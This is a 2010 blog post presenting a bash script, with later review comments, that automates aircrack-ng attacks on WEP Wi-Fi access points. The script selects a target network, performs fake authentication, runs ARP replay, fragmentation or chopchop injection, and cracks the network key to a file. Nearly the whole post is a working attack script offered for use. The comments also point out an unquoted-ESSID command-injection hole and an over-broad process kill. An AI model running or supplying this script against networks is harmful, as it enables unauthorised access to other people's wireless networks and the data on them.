Jul 10 2010
I thought I would post my bash WEP cracking script. I made this on the BackTrack 4 Final Linux distro, which is Ubuntu-based; it uses aircrack-ng and a subdirectory called data.
This script would be of most interest to people who use multiple wireless interfaces to capture. It lets you test each card's reception and specify which card does the injection and which are simply there to listen.
It implements all the aircrack-ng attacks against WEP access points, and I have had success using all of them.
If I get interested in WPA cracking I’ll post another script.
# Interactive wrapper around the aircrack-ng suite (airmon-ng, airodump-ng,
# aireplay-ng, packetforge-ng, aircrack-ng) that drives several wireless
# interfaces at once and opens extra windows with `terminator`.
# Capture and result files go under ./data, which must already exist
# (nothing here creates it). Runs interactively; expects root (ifconfig/iwconfig).
#
# NOTE(review): points a reader should know before trusting this script:
#  - No shebang and no `set -e`/`-u`; every expansion is unquoted and every
#    command substitution uses backticks, so interface names, BSSIDs and
#    ESSIDs that contain spaces or shell metacharacters break or alter the
#    commands built below.
#  - $ESSID is copied straight out of airodump-ng's CSV, i.e. it is text
#    chosen by whoever runs the access point. It is then spliced into
#    double-quoted shell command strings given to `terminator --command`
#    and into file names (data/$ESSID.pkt, data/$ESSID.key.txt). Treat the
#    SSID field as untrusted input to this script, not as a safe identifier.
#  - kill_air sends SIGTERM to every process whose `ps -A` line contains
#    "air", not only the aircrack-ng tools.
#  - Line breaks below were restored from a collapsed copy of the script;
#    the statements themselves are unchanged.

# Kill every process whose name (as printed by `ps -A`) contains "air".
# Globals:   none
# Arguments: none
# Outputs:   kill's own diagnostics, if any
kill_air() {
  kill `ps -A | grep air | grep -o -E '^[0-9]+'`
}

# Base airodump-ng options. CSV output is required: the ESSID menu further
# down parses data/stations-01.csv by column.
airodump_options="-a --write data/stations --beacons --output-format csv"

# Build the comma-separated interface list: first word of each iwconfig
# line, suffixed with ",", then the trailing comma and all spaces removed.
# NOTE(review): iwconfig also prints a line for interfaces without wireless
# extensions (lo, eth0, ...), so $cap presumably contains non-wireless
# devices too — confirm on the target box.
cap=`iwconfig | grep -o -E '^\w+' | sed 's/$/,/g'`
cap=`echo $cap | sed 's/,$//' | sed 's/ //g'`

clear
echo "Trips WEP cracking script"
echo -n "http://www.somedodgywebsite.com/wp/software/wep-cracking-with-aircrack/"
airmon-ng

# Injection interface: menu over $cap with the commas turned back into
# spaces. The MAC is read from the ifconfig line that contains the chosen
# name (substring match, so e.g. wlan1 also matches wlan10), expecting a
# trailing hardware address written with "-" separators, which are then
# rewritten to ":".
echo "Select injection interface"
select opt in `echo $cap | sed 's/,/ /g'`
do
  inj=$opt
  MAC=`ifconfig | grep "$inj" | grep -o -E '[0-9A-F-]+[ ]+$' | cut -c 1-17 | sed 's/-/:/g'`
  echo "DEBUG:MAC:$MAC"
  break
done

# Listening interface handed to aireplay-ng via -i in the attack section.
echo ""; echo "Select your best receiver"
select opt in `echo $cap | sed 's/,/ /g'`
do
  TRUMPET=$opt
  break
done

# Anything other than a literal "n" (including an empty answer) keeps the
# WEP-only filter.
echo ""; echo -n "Just WEP? (y/n)[y] "
read answer
if [ "$answer" != "n" ]
then
  airodump_options="$airodump_options --encrypt WEP"
fi

# Empty answer leaves channel_options unset, i.e. airodump-ng hops channels.
echo ""; echo -n "Select channel (1-13)[all] "
read answer
if [ "$answer" != "" ]
then
  channel_options="--channel $answer"
fi

# Put every interface in $cap into monitor mode. The last three iwconfig
# calls are allowed to fail silently (not all drivers support them).
echo ""; echo "Setting capture cards"
for int in `echo $cap | sed 's/,/ /g'`
do
  ifconfig $int down
  iwconfig $int rate 1M
  iwconfig $int mode monitor
  iwconfig $int key off >/dev/null 2>&1
  iwconfig $int txpower 16 >/dev/null 2>&1
  iwconfig $int power off >/dev/null 2>&1
done

# Optional per-card check: one airodump-ng window per interface, stacked
# 150 px apart. These windows are backgrounded and never reaped here.
echo -n "Check individual card reception (y/n)[n] "
read answer
if [ "$answer" = "y" ]
then
  y=1
  for int in `echo $cap | sed 's/,/ /g'`
  do
    terminator --geometry 1200x200+1+$y --command "airodump-ng $airodump_options $channel_options $int" &
    y=$(($y+150))
  done
  echo -n "Happy with individual reception (y/n)[y] "
  read answer
  if [ "$answer" = "n" ]
  then
    exit
  fi
fi

# Drop earlier captures, presumably so airodump-ng restarts its numbering
# and the file read below is data/stations-01.csv. No -f: prints an error
# when nothing matches. The combined capture runs in this terminal until
# the user stops it.
rm data/stations*
airodump-ng $airodump_options $channel_options $cap

echo -n "Found suitable network to attack?(y/n)[y] "
read answer
if [ "$answer" = "n" ]
then
  echo "Bummer :("
  exit
fi

# ESSID menu: column 14 of the CSV, skipping the first two rows, keeping
# only values with at least one word character. The substitution is
# unquoted, so an ESSID containing spaces appears as several menu entries.
echo "Select ESSID target"
select target in `awk -F , '{if (NR>2) print $14}' data/stations-01.csv | grep -E '\w'`
do
  ESSID=$target
  break
done

# BSSID / channel / encryption come from the FIRST line that contains the
# ESSID text anywhere (grep regex, substring match), not from the row the
# user picked. Column numbers refer to airodump-ng's CSV layout.
BSSID=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $1}'`
CHANNEL=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $4}' | grep -o -E '[0-9]+'`
ENCRYPT=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $6}'`

echo ""
echo "ESSID = $ESSID"
echo "BSSID = $BSSID"
echo "Channel = $CHANNEL"
echo "Encryption = $ENCRYPT"
echo "Injection Interface = $inj"
echo "Injection MAC = $MAC"
echo "Best Reception Interface = $TRUMPET"
echo ""
echo -n "Proceed with attack? (y/n)[y] "
read answer
if [ "$answer" = "n" ]
then
  echo "Goobye :)"
  exit
fi

# Re-run the monitor-mode setup, this time pinned to $CHANNEL.
echo "Setting interfaces for attack"
for int in `echo $cap | sed 's/,/ /g'`
do
  ifconfig $int down
  iwconfig $int rate 1M
  iwconfig $int mode monitor
  iwconfig $int power off >/dev/null 2>&1
  iwconfig $int channel $CHANNEL
done
ifconfig $inj down
#ignore : Tests have shown no difference between 1M and 54M on ar9170usb
iwconfig $inj rate 1M
iwconfig $inj channel $CHANNEL

# Each "->" echo prints the command that is about to be run. This one runs
# in a separate terminator window in the background; the script only waits
# a fixed 10 seconds and never checks whether it succeeded.
echo ""; echo "-> aireplay-ng --fakeauth=60 -a $BSSID -e $ESSID -q 10 -h $MAC -i $TRUMPET $inj"
echo "Associating..."
terminator --geometry 1200x100+1+1 --command "aireplay-ng --fakeauth=60 -a $BSSID -e $ESSID -q 10 -h $MAC -i $TRUMPET $inj" &
echo ""; echo "Waiting 10 seconds for association..."
sleep 10
echo "If association failed start it again in another console using the aforementioned command"
echo "Press enter to continue with cracking"
read answer

# The menu list is produced by three echos, two of them backgrounded (&),
# so the order of the three entries is not guaranteed.
echo "Choose attack method"
select attack in `echo "CHOPCHOP" & echo "ARP" & echo "Fragment"`; do echo "$attack Selected"; echo ""; break; done

# Fragment branch. Files chain the tools: aireplay-ng writes fragment*.xor,
# packetforge-ng reads them and writes data/$ESSID.pkt, which the
# interactive replay reads. NOTE(review): the echoed replay command says
# "-x 200" but the executed one uses "-x 100". The final terminator call is
# not backgrounded, so kill_air runs only after it returns; the window's
# shell appends the ESSID to the key file when the user presses enter.
if [ "$attack" = "Fragment" ]
then
  rm fragment*.xor
  rm replay_src*.cap
  echo ""
  echo "-> aireplay-ng --fragment -a $BSSID -e $ESSID -h $MAC $inj"
  aireplay-ng --fragment -a $BSSID -e $ESSID -h $MAC $inj
  echo ""
  echo "-> packetforge-ng --arp -a $BSSID -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment* -w data/$ESSID.pkt"
  packetforge-ng --arp -a $BSSID -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment* -w data/$ESSID.pkt
  echo ""
  echo "-> aireplay-ng --interactive -F -r data/$ESSID.pkt -x 200 -h $MAC -b $BSSID $inj"
  aireplay-ng --interactive -F -r data/$ESSID.pkt -x 100 -h $MAC -b $BSSID $inj &
  echo ""
  echo "-> airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap"
  terminator --geometry 1200x300+1+100 --command "airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap" &
  echo ""
  echo "-> aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs"
  terminator --geometry 1200x200+1+300 --command "echo 'Cracking stating in 10 seconds' ; sleep 10 ; aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs ; echo 'Press enter to exit' ; read answer ; echo ' $ESSID' >> data/$ESSID.key.txt"
  kill_air
fi

# ARP branch: same capture/crack windows as above; replay and capture are
# backgrounded, the crack window is not, then kill_air.
if [ "$attack" = "ARP" ]
then
  echo "-> aireplay-ng --arpreplay -a $BSSID -e $ESSID -h $MAC -x 100 -i $TRUMPET $inj"
  aireplay-ng --arpreplay -a $BSSID -e $ESSID -h $MAC -x 100 -i $TRUMPET $inj &
  echo "-> airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap"
  terminator --geometry 1200x300+1+100 --command "airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap" &
  echo "-> aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs"
  terminator --geometry 1200x200+1+300 --command "echo 'Press enter to start cracking, you must have started sending packets.' ; read answer ; aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs ; echo 'Press enter to exit' ; read answer ; echo ' $ESSID' >> data/$ESSID.key.txt"
  kill_air
fi

# CHOPCHOP branch runs in the foreground and, unlike the other two, starts
# no capture or crack window and does not call kill_air.
if [ "$attack" = "CHOPCHOP" ]
then
  echo ""; echo "-> aireplay-ng --chopchop -a $BSSID -e $ESSID -h $MAC -i $TRUMPET $inj"
  aireplay-ng --chopchop -a $BSSID -e $ESSID -h $MAC -i $TRUMPET $inj
fi

# Same over-broad "air" match as kill_air; output is word-split by the
# unquoted substitution, so it prints on one line.
echo ""; echo "These 'air*' processes are still running:"
echo `ps -A | grep air`